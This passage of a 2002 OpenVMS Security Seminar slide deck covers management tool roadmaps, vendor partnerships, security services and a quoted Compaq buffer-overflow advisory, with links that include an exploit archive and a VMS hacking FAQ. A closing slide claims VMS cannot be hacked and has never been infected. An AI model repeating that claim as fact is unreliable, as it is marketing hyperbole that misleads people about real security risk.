– V2.2 VMS 7.3-1 support (end of Summer)

– V2.3 DECamds parity, no process event, write locks, low vote, etc.

• Graphical Configuration Manager V1.0 to ship with 7.3-1

• OpenVMS Web Agents V2.3 released in April

– Integrates with CIM 7, supports OVMS 7.1 - 7.3

– Supports new AlphaServer environmentals for DS, ES and GS series

• ECP Data Collector & Performance Analyzer V5.4B with VMS 7.3-1

• Increase access to metrics via system services, industry standard SNMP MIBs & general performance data collector

Page 61:

Performance Solution Positioning

• Availability Manager

– Real time performance monitor for OpenVMS system managers

– Collects system & process data and is under active development

• ECP Data Collector & Performance Analyzer

– Historical GUI performance analyzer for OpenVMS

– Maintenance releases & limited in scope

• Third Party Performance Solutions (BMC, CA, etc.)

– Enterprise level multi platform integrated solutions

Page 62:

HP OpenView Connectivity

• CIM Enterprise solution

– Plug in for HP OpenView

– Used in conjunction with OpenVMS Web agent

– OVMS Web Agents to CIM Plug-in to HP OpenView

• Comtek Services (www.comtekservices.com)

– Develop OVMS SNMP Performance Agents

– OpenVMS HP OpenView Network Node Manager (NNM)

– 300 data collection objects and 50 traps for OpenVMS

– 75 data objects, 30 traps & performance graphs for HP OpenView

Page 63: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

filename\location

POLYCENTER Evolution on OpenVMS – Single Products

POLYCENTER PerformanceAdvisor, Data Collector,Accounting Chargeback

POLYCENTER Console Manager

POLYCENTER System Watchdog

POLYCENTER Scheduler

BMC Perform & Predict for OpenVMS – http://www.bmc.com

TECSYS ConsoleWorks for OpenVMS – http://www.tdix.com

BMC Patrol for OpenVMS – http://www.bmc.com

ISE EnterpriseSchedule – http://www.i-s-e.com

Data/Database Conversion: ATTUNITY – http://www.attunity.com

ARGENT MVP Scheduler – http://www.jams.argent-software.com

Security Audit: POINT SECURE System Detective – http://www.pointsecure.com

DVD/CD/CDR/WORM/Optical: U.S. Design for OpenVMS – http://www.usdesign.com

Page 64: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

BMC Software Alliance

• OpenVMS/BMC Technology & Marketing agreement in place for 1 year

• Joint development effort has integrated an OpenVMS data collector for BMC Patrol Perform & Predict

– Offering consistent reporting & analysis of Disk I/O, Process, Cluster Configuration, System Parameter & Performance Metrics

– Delivers improved problem analysis & more accurate capacity planning than OpenVMS Monitor data

– Supports enhanced workload analysis for a business-centric view of OpenVMS resource requirements

•BMC Software has made significant investment to bring OpenVMS up to parity with Unix and MS Windows product offerings

Page 65: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

BMC Software Cont’d

•OpenVMS lab testing for BMC Patrol for OpenVMS

–Gains in CPU utilization efficiencies implemented

•Improved BMC OpenVMS release schedule

– Patrol for OpenVMS V2.4 – January 2002

– Patrol Perform & Predict V4.5 – April 2002

– Patrol for OpenVMS V2.5 – Planned June 2002

•BMC OpenVMS functional improvements:

– Enterprise management station for all Compaq platforms

– Improved user interface for menu selection

– Additional information on process resource utilization

– More accurate data analysis on a native OpenVMS platform

– Enhanced security for Patrol for OpenVMS (SSL, 5 security levels, etc.)

Page 66: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

BMC Software Cont’d

•BMC TDI ConsoleWorks integration for OpenVMS

– TDI ConsoleWorks now certified by BMC on the Patrol console

– TDI to map console events to BMC Patrol Console Manager

– TDI to become re-seller of BMC products

• Free trial downloads of the Patrol for OpenVMS solution available on the BMC Software web site

• TDC data collector download: www.openvms.compaq.com/openvms/products/tdc/index.html

Page 67: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Computer Associates Update

• CA’s portfolio of products running on OpenVMS contains:

– Unicenter brand of enterprise management products

– eTrust brand of security products

– BrightStor brand of storage products

– Advantage brand of data management products, including the Ingres database

•CA OpenVMS solutions have gone through a re-branding

Page 68: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

POLYCENTER Evolution on OpenVMS – with Unicenter Branded Modular Solutions

POLYCENTER Performance Advisor, Data Collector, Accounting Chargeback → Unicenter Performance Management for OpenVMS

POLYCENTER Console Manager → Unicenter Console Management for OpenVMS

POLYCENTER System Watchdog → Unicenter System Watchdog for OpenVMS

POLYCENTER Scheduler → Unicenter Job Management for OpenVMS

Page 69: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

OpenVMS Security Services

Page 70: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Security healthchecks with tools from PointSecure

Security Healthcheck Service for OpenVMS (SHSO)

• A full Services-led OpenVMS security review utilizing HP Services & assessment tools

• Generates a report on the state of system security

Security Self-Check for OpenVMS (SSCO)

• Customer self-check

– PointAudit

– System Detective

– SAT

• Implementation, training & support provided through HP Services

• Customer keeps the tools

Page 71: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Recent Security Automation

Large Hospital environment with 388,845 logins/month

Challenge:

• to automate a manual security process

• tools which adhere to today’s best practice

• flexibility for assisting with HIPAA compliance

Solution: Point Audit and System Detective from PointSecure, an OpenVMS-only software partner

Page 72: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Enhancing security with SyntheSys

JabCast Secure Realtime Communications (SRC)

Secure real-time interactive text, file and document exchange across multiple operating systems.

The idSURE Card™

A biometric crypto-processing smart card integrated with a Public Key Infrastructure (PKI), digital signatures, and a Trust Center.

– Available today on IP interface

– Available July on OpenVMS machine hardware interfaces

Page 73: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Compaq Services

Security Service Descriptions

Security Policy development

Security Policy deployment

System Health Check

System Detective Installation

Remote Security Monitoring

Smart Card Installation/Deployment

Security Audit of Your Site

Wireless Audit of Your Site

Compaq can help with as much or as little security assistance as you need.

Page 74: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

If you are interested in VMS security

http://www.dfwcug.org/ Quadwords Newsletter

http://vmsone.com/ Rabid VMS stuff

http://www.cert.org/ Security advisories

http://cve.mitre.org/cve/ Security advisories

http://www.support.compaq.com/patches/mailing-list.shtml

http://pulhas.org/xploits/ System Holes since 1996;-)

http://manson.vistech.net/ht_root/Hack-VMS-faq Doc cypher VMS FAQ

Page 75: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Patch mailing list: http://www.support.compaq.com/patches/mailing-list.shtml

Subject: [Advisory] SSRT0766 Potential Buffer Overflow for Compaq Insight Manager XE (only)
Date: Mon, 29 Oct 2001 15:28:54 -0700
From: "Boren, Rich (SSRT)" <[email protected]>
Reply-To: "Security Patch Mailing List" <[email protected]>
To: "Security Patch Mailing List" <[email protected]>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NO RESTRICTION FOR DISTRIBUTION PROVIDED THE ADVISORY REMAINS INTACT

TITLE: (SSRT0766) Potential Security Vulnerability Compaq Insight Manager XE Software

SOURCE: Software Security Response Team U.S. Compaq Computer Corporation *Reference SSRT0766* * x-ref SSRT0758*

Date: October 29, 2001

(c) Copyright 2001 Compaq Computer Corporation. All rights reserved.

PATCHES SUPERSEDED BY THIS ADVISORY: None

"Compaq is broadly distributing this Security Advisory in order to bring to the attention of users of Compaq products the----

Summary

Compaq Management Software products undergo rigorous quality assurance processes to ensure that they meet the highest possible standards for security, reliability and usability. In line with this commitment, Compaq recently uncovered a potential buffer overflow security vulnerability in its SNMP and DMI support within Compaq Insight Manager XE. This vulnerability has the potential to enable unauthorized users to execute code at an administrator level through the exploitation of a buffer overflow. Compaq has addressed this issue with version 2.1c of Compaq Insight Manager XE and the recently announced Compaq Insight Manager 7. Compaq strongly recommends that customers upgrade to version 2.1c or Compaq Insight Manager 7.

Compaq strongly recommends that management agents and Compaq Insight Manager XE be deployed only on private networks and not used on the open Internet or on systems outside the bounds of the firewall. The implementation of sound security practices, which includes disabling external access to Compaq management ports, should help protect customers from external malicious attacks. Compaq also recommends that strong password standards are used and that passwords are changed regularly.

Page 76: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

OpenVMS Security Seminar

Q&A

Page 77: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

VMS when computer failure is not an option!

Mitnick can’t hack VMS

Bin Laden can’t take out VMS

And not one of the 70,000+ viruses ever to roam the internet has ever infected or corrupted an OpenVMS system.

That’s why after 25 years, companies still use and Trust OpenVMS.

And now it’s your move for computer security…

Page 78: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Page 79: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

The Fine Print

Copyright 2002 Hewlett Packard Corporation All rights reserved.

While Compaq believes the information included in this presentation is correct as of the date produced, it is subject to change without notice.

All trademarks and registered trademarks are the property of their respective holders. Itanium™ and IA-64™ are trademarks of Intel.

Presentation void where taxed or prohibited by law.

Recommended for technical and engineering ranks ages 12 and up. Ask for special pointy-haired-boss toy.

Do not taunt Happy Fun Ball.

Known Glaze-on hazard, please keep this and all other similar presentations away from known-sensitive members of engineering, marketing and management.

Page 80: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.

Page 81: Filename\location John Robert Wisniewski June, 2002 OpenVMS Security Seminar.